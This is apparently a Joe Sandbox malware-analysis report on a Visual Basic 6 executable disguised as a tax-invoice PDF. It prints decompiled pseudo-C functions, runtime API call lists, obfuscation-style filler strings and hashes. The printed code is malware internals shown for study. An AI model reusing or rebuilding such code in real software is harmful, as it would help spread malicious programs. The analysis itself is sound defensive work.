__vbaHresultCheckObj.MSVBVM60(00000000,?,00411900,00000108), ref: 00415871
__vbaFreeObj.MSVBVM60 ref: 0041588A
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 004158A2
__vbaObjSet.MSVBVM60(?,00000000), ref: 004158CF
__vbaChkstk.MSVBVM60(?,00000000), ref: 004158E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001EC), ref: 00415924
__vbaFreeObj.MSVBVM60 ref: 00415935
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 0041594D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041597A
__vbaChkstk.MSVBVM60(?,00000000), ref: 00415993
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118A4,000001EC), ref: 004159CF
__vbaFreeObj.MSVBVM60 ref: 004159E0
__vbaFreeStr.MSVBVM60(004159FE), ref: 004159F8

Strings

Behovsanalysens, xrefs: 004158F6
OSCINIDAE, xrefs: 004159A1

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$CheckFreeHresult$ChkstkNew2$Copy
String ID: Behovsanalysens$OSCINIDAE
API String ID: 948179728-4127510829
Opcode ID: 1d40dd0f30daa2f7a32c26f348afc1479011d04bde12aa7b50953a34140ce05d
Instruction ID: 89734cd9fe6a4c2396f344e921f2449a7a57b42bb2cc36dda0575674379f6d1d
Opcode Fuzzy Hash: 1d40dd0f30daa2f7a32c26f348afc1479011d04bde12aa7b50953a34140ce05d
Instruction Fuzzy Hash: 2671F4B0D01608EFCB00EF94D989BEDBBB5BF08314F20442AF511BB2A1C7B95995DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00415B37, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00415B37(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				signed int _v44;
				char _v48;
				char _v52;
				char _v68;
				char* _v92;
				char _v100;
				intOrPtr _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				short _t90;
				char* _t91;
				char* _t95;
				signed int _t99;
				signed int _t105;
				signed int _t110;
				void* _t130;
				void* _t132;
				intOrPtr _t133;

				_t133 = _t132 - 0xc;
				 *[fs:0x0] = _t133;
				L004014B0();
				_v16 = _t133;
				_v12 = 0x4012b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4014b6, _t130);
				L00401684();
				L00401684();
				_v92 =  &_v36;
				_v100 = 0x4008;
				_push( &_v100);
				_push( &_v68);
				L004015CA();
				_v108 = 0x41195c;
				_v116 = 0x8008;
				_push( &_v68);
				_t90 =  &_v116;
				_push(_t90);
				L00401678();
				_v120 = _t90;
				L00401636();
				_t91 = _v120;
				if(_t91 != 0) {
					if( *0x41a010 != 0) {
						_v156 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v156 = 0x41a010;
					}
					_t95 =  &_v48;
					L0040169C();
					_v120 = _t95;
					_t99 =  *((intOrPtr*)( *_v120 + 0x48))(_v120,  &_v40, _t95,  *((intOrPtr*)( *((intOrPtr*)( *_v156)) + 0x308))( *_v156));
					asm("fclex");
					_v124 = _t99;
					if(_v124 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x4117c8);
						_push(_v120);
						_push(_v124);
						L00401690();
						_v160 = _t99;
					}
					if( *0x41a31c != 0) {
						_v164 = 0x41a31c;
					} else {
						_push(0x41a31c);
						_push(0x411788);
						L00401696();
						_v164 = 0x41a31c;
					}
					_v128 =  *_v164;
					_t105 =  *((intOrPtr*)( *_v128 + 0x4c))(_v128,  &_v52);
					asm("fclex");
					_v132 = _t105;
					if(_v132 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x411778);
						_push(_v128);
						_push(_v132);
						L00401690();
						_v168 = _t105;
					}
					_v136 = _v52;
					_t110 =  *((intOrPtr*)( *_v136 + 0x24))(_v136, L"mesenterical", _v40,  &_v44);
					asm("fclex");
					_v140 = _t110;
					if(_v140 >= 0) {
						_v172 = _v172 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x411980);
						_push(_v136);
						_push(_v140);
						L00401690();
						_v172 = _t110;
					}
					_v152 = _v44;
					_v44 = _v44 & 0x00000000;
					L00401648();
					L0040165A();
					_push( &_v52);
					_t91 =  &_v48;
					_push(_t91);
					_push(2);
					L00401654();
				}
				_push(0x415dcb);
				L0040165A();
				L0040165A();
				L0040165A();
				return _t91;
			}

0x00415b3a
0x00415b49
0x00415b55
0x00415b5d
0x00415b60
0x00415b67
0x00415b76
0x00415b7f
0x00415b8c
0x00415b94
0x00415b97
0x00415ba1
0x00415ba5
0x00415ba6
0x00415bab
0x00415bb2
0x00415bbc
0x00415bbd
0x00415bc0
0x00415bc1
0x00415bc6
0x00415bcd
0x00415bd2
0x00415bd8
0x00415be5
0x00415c02
0x00415be7
0x00415be7
0x00415bec
0x00415bf1
0x00415bf6
0x00415bf6
0x00415c26
0x00415c2a
0x00415c2f
0x00415c3e
0x00415c41
0x00415c43
0x00415c4a
0x00415c66
0x00415c4c
0x00415c4c
0x00415c4e
0x00415c53
0x00415c56
0x00415c59
0x00415c5e
0x00415c5e
0x00415c74
0x00415c91
0x00415c76
0x00415c76
0x00415c7b
0x00415c80
0x00415c85
0x00415c85
0x00415ca3
0x00415cb2
0x00415cb5
0x00415cb7
0x00415cbe
0x00415cda
0x00415cc0
0x00415cc0
0x00415cc2
0x00415cc7
0x00415cca
0x00415ccd
0x00415cd2
0x00415cd2
0x00415ce4
0x00415d04
0x00415d07
0x00415d09
0x00415d16
0x00415d38
0x00415d18
0x00415d18
0x00415d1a
0x00415d1f
0x00415d25
0x00415d2b
0x00415d30
0x00415d30
0x00415d42
0x00415d48
0x00415d55
0x00415d5d
0x00415d65
0x00415d66
0x00415d69
0x00415d6a
0x00415d6c
0x00415d71
0x00415d74
0x00415db5
0x00415dbd
0x00415dc5
0x00415dca

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00415B55
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00415B7F
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 00415B8C
#524.MSVBVM60(?,00004008), ref: 00415BA6
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,00004008), ref: 00415BC1
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 00415BCD
__vbaNew2.MSVBVM60(00411D38,0041A010,00008008,?,?,?,?,00004008), ref: 00415BF1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 00415C2A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117C8,00000048,?,?,?,?,?,?,?,?,00008008,?), ref: 00415C59
__vbaNew2.MSVBVM60(00411788,0041A31C,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 00415C80
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411778,0000004C,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 00415CCD
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411980,00000024,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 00415D2B
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 00415D55
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 00415D5D
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008), ref: 00415D6C
__vbaFreeStr.MSVBVM60(00415DCB,00008008,?,?,?,?,00004008), ref: 00415DB5
__vbaFreeStr.MSVBVM60(00415DCB,00008008,?,?,?,?,00004008), ref: 00415DBD
__vbaFreeStr.MSVBVM60(00415DCB,00008008,?,?,?,?,00004008), ref: 00415DC5

Strings

mesenterical, xrefs: 00415CF1

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckHresult$CopyNew2$#524ChkstkListMove
String ID: mesenterical
API String ID: 3204310403-3574708753
Opcode ID: da70b35cdb50e52423d42da5d52cc172eb7ba09d91f3b3831d9c89dfdc393ac5
Instruction ID: 1a85f5593c2d5943cde8aa4b87a5f5e9b31f49e079e6cab988c4b3b5779cdcb3
Opcode Fuzzy Hash: da70b35cdb50e52423d42da5d52cc172eb7ba09d91f3b3831d9c89dfdc393ac5
Instruction Fuzzy Hash: 42712B71900218DFCB10DFA5CD85BDDBBB8BF08304F1085AAE105B72A1DB795A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041626E, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041626E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed int _v84;
				char* _t78;
				signed int _t82;
				char* _t86;
				signed int _t90;
				char* _t94;
				signed int _t98;
				void* _t120;
				void* _t122;
				intOrPtr _t123;

				_t123 = _t122 - 0xc;
				 *[fs:0x0] = _t123;
				L004014B0();
				_v16 = _t123;
				_v12 = 0x401300;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4014b6, _t120);
				if( *0x41a010 != 0) {
					_v64 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v64 = 0x41a010;
				}
				_t78 =  &_v28;
				L0040169C();
				_v48 = _t78;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t82 =  *((intOrPtr*)( *_v48 + 0x1ec))(_v48, L"Erst7", 0x10, _t78,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x370))( *_v64));
				asm("fclex");
				_v52 = _t82;
				if(_v52 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x4118a4);
					_push(_v48);
					_push(_v52);
					L00401690();
					_v68 = _t82;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v72 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v72 = 0x41a010;
				}
				_t86 =  &_v28;
				L0040169C();
				_v48 = _t86;
				_v36 = 1;
				_v44 = 2;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t90 =  *((intOrPtr*)( *_v48 + 0x1b8))(_v48, 0x10, _t86,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x36c))( *_v72));
				asm("fclex");
				_v52 = _t90;
				if(_v52 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x1b8);
					_push(0x4117d8);
					_push(_v48);
					_push(_v52);
					L00401690();
					_v76 = _t90;
				}
				L0040168A();
				if( *0x41a010 != 0) {
					_v80 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v80 = 0x41a010;
				}
				_t94 =  &_v28;
				L0040169C();
				_v48 = _t94;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t98 =  *((intOrPtr*)( *_v48 + 0x1ec))(_v48, L"panels", 0x10, _t94,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x32c))( *_v80));
				asm("fclex");
				_v52 = _t98;
				if(_v52 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x4117fc);
					_push(_v48);
					_push(_v52);
					L00401690();
					_v84 = _t98;
				}
				L0040168A();
				_push(0x4164bb);
				return _t98;
			}

0x00416271
0x00416280
0x0041628a
0x00416292
0x00416295
0x0041629c
0x004162ab
0x004162b5
0x004162cf
0x004162b7
0x004162b7
0x004162bc
0x004162c1
0x004162c6
0x004162c6
0x004162ea
0x004162ee
0x004162f3
0x004162f6
0x004162fd
0x00416307
0x00416311
0x00416312
0x00416313
0x00416314
0x00416322
0x00416328
0x0041632a
0x00416331
0x0041634d
0x00416333
0x00416333
0x00416338
0x0041633d
0x00416340
0x00416343
0x00416348
0x00416348
0x00416354
0x00416360
0x0041637a
0x00416362
0x00416362
0x00416367
0x0041636c
0x00416371
0x00416371
0x00416395
0x00416399
0x0041639e
0x004163a1
0x004163a8
0x004163b2
0x004163bc
0x004163bd
0x004163be
0x004163bf
0x004163c8
0x004163ce
0x004163d0
0x004163d7
0x004163f3
0x004163d9
0x004163d9
0x004163de
0x004163e3
0x004163e6
0x004163e9
0x004163ee
0x004163ee
0x004163fa
0x00416406
0x00416420
0x00416408
0x00416408
0x0041640d
0x00416412
0x00416417
0x00416417
0x0041643b
0x0041643f
0x00416444
0x00416447
0x0041644e
0x00416458
0x00416462
0x00416463
0x00416464
0x00416465
0x00416473
0x00416479
0x0041647b
0x00416482
0x0041649e
0x00416484
0x00416484
0x00416489
0x0041648e
0x00416491
0x00416494
0x00416499
0x00416499
0x004164a5
0x004164aa
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 0041628A
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 004162C1
__vbaObjSet.MSVBVM60(?,00000000), ref: 004162EE
__vbaChkstk.MSVBVM60(?,00000000), ref: 00416307
__vbaHresultCheckObj.MSVBVM60(00000000,?,004118A4,000001EC), ref: 00416343
__vbaFreeObj.MSVBVM60 ref: 00416354
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 0041636C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00416399
__vbaChkstk.MSVBVM60(?,00000000), ref: 004163B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117D8,000001B8), ref: 004163E9
__vbaFreeObj.MSVBVM60 ref: 004163FA
__vbaNew2.MSVBVM60(00411D38,0041A010), ref: 00416412
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041643F
__vbaChkstk.MSVBVM60(?,00000000), ref: 00416458
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001EC), ref: 00416494
__vbaFreeObj.MSVBVM60 ref: 004164A5

Strings

Erst7, xrefs: 00416315
panels, xrefs: 00416466

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2
String ID: Erst7$panels
API String ID: 3189907775-1262606590
Opcode ID: beedd8bafe97b2edd6583ea7b4b763b88ab3bc3810aba87372ec7bc338bc350d
Instruction ID: 901af66ba3e400222694e50bf4f12c5f1be77e8693fbd8ba0cd2d7203f9dac36
Opcode Fuzzy Hash: beedd8bafe97b2edd6583ea7b4b763b88ab3bc3810aba87372ec7bc338bc350d
Instruction Fuzzy Hash: 4761E670D00208EFCB11DFA5D849BDDBBB9BF08714F14882AF911BB2A1C7B99485DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00414515, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00414515(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v44;
				char _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* _v72;
				signed int _v76;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				signed int _t59;
				char* _t67;
				signed int _t71;
				char* _t75;
				signed int _t79;
				intOrPtr _t103;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t103;
				_t59 = 0x50;
				L004014B0();
				_v12 = _t103;
				_v8 = 0x401190;
				L00401642();
				L00401648();
				_push(_t59);
				_push(L"Irrationales");
				L0040164E();
				asm("sbb eax, eax");
				_v72 =  ~( ~_t59 + 1);
				L0040165A();
				if(_v72 != 0) {
					if( *0x41a010 != 0) {
						_v88 = 0x41a010;
					} else {
						_push(0x41a010);
						_push(0x411d38);
						L00401696();
						_v88 = 0x41a010;
					}
					_t75 =  &_v36;
					L0040169C();
					_v72 = _t75;
					_t79 =  *((intOrPtr*)( *_v72 + 0x50))(_v72,  &_v32, _t75,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x374))( *_v88));
					asm("fclex");
					_v76 = _t79;
					if(_v76 >= 0) {
						_v92 = _v92 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x4117b8);
						_push(_v72);
						_push(_v76);
						L00401690();
						_v92 = _t79;
					}
					_v84 = _v32;
					_v32 = _v32 & 0x00000000;
					_v44 = _v84;
					_v52 = 8;
					_push( &_v52);
					L0040163C();
					L0040168A();
					L00401636();
				}
				if( *0x41a010 != 0) {
					_v96 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v96 = 0x41a010;
				}
				_t67 =  &_v36;
				L0040169C();
				_v72 = _t67;
				_v60 = 1;
				_v68 = 2;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t71 =  *((intOrPtr*)( *_v72 + 0x190))(_v72, 0x10, _t67,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x308))( *_v96));
				asm("fclex");
				_v76 = _t71;
				if(_v76 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x190);
					_push(0x4117c8);
					_push(_v72);
					_push(_v76);
					L00401690();
					_v100 = _t71;
				}
				L0040168A();
				_v28 = 0xc2062000;
				_v24 = 0x5b07;
				_push(0x4146fd);
				return _t71;
			}

0x0041451a
0x00414525
0x00414526
0x0041452f
0x00414530
0x00414538
0x0041453b
0x00414542
0x0041454c
0x00414551
0x00414552
0x00414557
0x0041455e
0x00414563
0x0041456a
0x00414575
0x00414582
0x0041459c
0x00414584
0x00414584
0x00414589
0x0041458e
0x00414593
0x00414593
0x004145b7
0x004145bb
0x004145c0
0x004145cf
0x004145d2
0x004145d4
0x004145db
0x004145f4
0x004145dd
0x004145dd
0x004145df
0x004145e4
0x004145e7
0x004145ea
0x004145ef
0x004145ef
0x004145fb
0x004145fe
0x00414605
0x00414608
0x00414612
0x00414613
0x0041461b
0x00414623
0x00414623
0x0041462f
0x00414649
0x00414631
0x00414631
0x00414636
0x0041463b
0x00414640
0x00414640
0x00414664
0x00414668
0x0041466d
0x00414670
0x00414677
0x00414681
0x0041468b
0x0041468c
0x0041468d
0x0041468e
0x00414697
0x0041469d
0x0041469f
0x004146a6
0x004146c2
0x004146a8
0x004146a8
0x004146ad
0x004146b2
0x004146b5
0x004146b8
0x004146bd
0x004146bd
0x004146c9
0x004146ce
0x004146d5
0x004146dc
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 00414530
#669.MSVBVM60(?,?,?,?,004014B6), ref: 00414542
__vbaStrMove.MSVBVM60(?,?,?,?,004014B6), ref: 0041454C
__vbaStrCmp.MSVBVM60(Irrationales,00000000,?,?,?,?,004014B6), ref: 00414557
__vbaFreeStr.MSVBVM60(Irrationales,00000000,?,?,?,?,004014B6), ref: 0041456A
__vbaNew2.MSVBVM60(00411D38,0041A010,Irrationales,00000000,?,?,?,?,004014B6), ref: 0041458E
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,Irrationales,00000000), ref: 004145BB
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117B8,00000050), ref: 004145EA
#529.MSVBVM60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,Irrationales,00000000), ref: 00414613
__vbaFreeObj.MSVBVM60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,Irrationales,00000000), ref: 0041461B
__vbaFreeVar.MSVBVM60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,Irrationales,00000000), ref: 00414623
__vbaNew2.MSVBVM60(00411D38,0041A010,Irrationales,00000000,?,?,?,?,004014B6), ref: 0041463B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414668
__vbaChkstk.MSVBVM60(?,00000000), ref: 00414681
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117C8,00000190), ref: 004146B8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,Irrationales,00000000), ref: 004146C9

Strings

Irrationales, xrefs: 00414552

Memory Dump Source

Source File: 00000000.00000002.1166278332.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1166262488.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1166308014.000000000041A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1166326236.000000000041B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NTS_eTaxInvoice#U00a004-08-2021#U00b7pdf.jbxd

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2$#529#669Move
String ID: Irrationales
API String ID: 314221948-867213255
Opcode ID: dd9e8ac112f30e9eed55d4746369b14df91c59c4d7e7241863a116b3e7c415f3
Instruction ID: 0c6b2cc71594d2833552afac0302ebacdfc5302844084adef298c6aebf8472e2
Opcode Fuzzy Hash: dd9e8ac112f30e9eed55d4746369b14df91c59c4d7e7241863a116b3e7c415f3
Instruction Fuzzy Hash: 5751FA71D002089FCB10DFD0C859BEEBBB8BF08708F24452AE501BB2A1D77D6986CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00417795, Relevance: 28.7, APIs: 19, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00417795(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				void* _v88;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v108;
				intOrPtr* _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				char* _t80;
				char* _t84;
				signed int _t88;
				signed int _t92;
				char* _t98;
				signed int _t104;
				intOrPtr _t117;
				intOrPtr _t133;

				_push(0x4014b6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t133;
				_push(0x6c);
				L004014B0();
				_v12 = _t133;
				_v8 = 0x4013a0;
				L00401684();
				if( *0x41a010 != 0) {
					_v108 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v108 = 0x41a010;
				}
				_push( *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x32c))( *_v108));
				_t80 =  &_v36;
				_push(_t80);
				L0040169C();
				_v96 = _t80;
				_v44 = 0x80020004;
				_v52 = 0xa;
				if( *0x41a010 != 0) {
					_v112 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v112 = 0x41a010;
				}
				_t84 =  &_v32;
				L0040169C();
				_v88 = _t84;
				_t88 =  *((intOrPtr*)( *_v88 + 0x50))(_v88,  &_v28, _t84,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x324))( *_v112));
				asm("fclex");
				_v92 = _t88;
				if(_v92 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x41181c);
					_push(_v88);
					_push(_v92);
					L00401690();
					_v116 = _t88;
				}
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t92 =  *((intOrPtr*)( *_v96 + 0x1ec))(_v96, _v28, 0x10);
				asm("fclex");
				_v100 = _t92;
				if(_v100 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x4117fc);
					_push(_v96);
					_push(_v100);
					L00401690();
					_v120 = _t92;
				}
				L0040165A();
				_push( &_v36);
				_push( &_v32);
				_push(2);
				L00401654();
				if( *0x41a010 != 0) {
					_v124 = 0x41a010;
				} else {
					_push(0x41a010);
					_push(0x411d38);
					L00401696();
					_v124 = 0x41a010;
				}
				_t117 =  *((intOrPtr*)( *_v124));
				_t98 =  &_v32;
				L0040169C();
				_v88 = _t98;
				_v76 = 0x80020004;
				_v84 = 0xa;
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004014B0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 =  *0x401398;
				_t104 =  *((intOrPtr*)( *_v88 + 0x1cc))(_v88, _t117, 0x10, 0x10, 0x10, _t98,  *((intOrPtr*)(_t117 + 0x374))( *_v124));
				asm("fclex");
				_v92 = _t104;
				if(_v92 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0x1cc);
					_push(0x4117b8);
					_push(_v88);
					_push(_v92);
					L00401690();
					_v128 = _t104;
				}
				L0040168A();
				asm("wait");
				_push(0x417a1f);
				L0040165A();
				return _t104;
			}

0x0041779a
0x004177a5
0x004177a6
0x004177ad
0x004177b0
0x004177b8
0x004177bb
0x004177c8
0x004177d4
0x004177ee
0x004177d6
0x004177d6
0x004177db
0x004177e0
0x004177e5
0x004177e5
0x00417808
0x00417809
0x0041780c
0x0041780d
0x00417812
0x00417815
0x0041781c
0x0041782a
0x00417844
0x0041782c
0x0041782c
0x00417831
0x00417836
0x0041783b
0x0041783b
0x0041785f
0x00417863
0x00417868
0x00417877
0x0041787a
0x0041787c
0x00417883
0x0041789c
0x00417885
0x00417885
0x00417887
0x0041788c
0x0041788f
0x00417892
0x00417897
0x00417897
0x004178a3
0x004178ad
0x004178ae
0x004178af
0x004178b0
0x004178bc
0x004178c2
0x004178c4
0x004178cb
0x004178e7
0x004178cd
0x004178cd
0x004178d2
0x004178d7
0x004178da
0x004178dd
0x004178e2
0x004178e2
0x004178ee
0x004178f6
0x004178fa
0x004178fb
0x004178fd
0x0041790c
0x00417926
0x0041790e
0x0041790e
0x00417913
0x00417918
0x0041791d
0x0041791d
0x00417937
0x00417941
0x00417945
0x0041794a
0x0041794d
0x00417954
0x0041795b
0x00417962
0x00417969
0x00417970
0x0041797a
0x00417984
0x00417985
0x00417986
0x00417987
0x0041798b
0x00417995
0x00417996
0x00417997
0x00417998
0x0041799c
0x004179a6
0x004179a7
0x004179a8
0x004179a9
0x004179b1
0x004179bc
0x004179c2
0x004179c4
0x004179cb
0x004179e7
0x004179cd
0x004179cd
0x004179d2
0x004179d7
0x004179da
0x004179dd
0x004179e2
0x004179e2
0x004179ee
0x004179f3
0x004179f4
0x00417a19
0x00417a1e

APIs

__vbaChkstk.MSVBVM60(?,004014B6), ref: 004177B0
__vbaStrCopy.MSVBVM60(?,?,?,?,004014B6), ref: 004177C8
__vbaNew2.MSVBVM60(00411D38,0041A010,?,?,?,?,004014B6), ref: 004177E0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041780D
__vbaNew2.MSVBVM60(00411D38,0041A010,?,00000000), ref: 00417836
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417863
__vbaHresultCheckObj.MSVBVM60(00000000,?,0041181C,00000050), ref: 00417892
__vbaChkstk.MSVBVM60 ref: 004178A3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004117FC,000001EC), ref: 004178DD
__vbaFreeStr.MSVBVM60 ref: 004178EE
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004178FD
